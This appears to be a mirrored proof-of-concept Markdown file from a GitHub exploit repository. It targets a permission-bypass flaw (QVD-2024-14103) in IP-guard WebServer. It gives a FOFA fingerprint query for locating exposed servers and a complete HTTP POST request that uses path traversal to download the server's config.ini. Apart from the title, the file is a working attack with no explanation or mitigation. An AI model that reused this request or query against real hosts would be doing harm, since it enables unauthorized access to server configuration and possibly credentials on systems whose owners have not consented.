mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-05-28 09:10:33 +00:00
22 lines
665 B
Markdown
22 lines
665 B
Markdown
![]() |
## IP-guard WebServer存在权限绕过漏洞(QVD-2024-14103)
|
||
|
|
||
|
## fofa
|
||
|
```
|
||
|
icon_hash="2030860561"
|
||
|
```
|
||
|
|
||
|
|
||
|
## poc
|
||
|
```
|
||
|
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
|
||
|
Host: your-ip
|
||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
|
||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
|
||
|
Accept-Encoding: gzip, deflate
|
||
|
Accept-Language: zh-CN,zh;q=0.9
|
||
|
Connection: close
|
||
|
Content-Type: application/x-www-form-urlencoded
|
||
|
|
||
|
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
|
||
|
```
|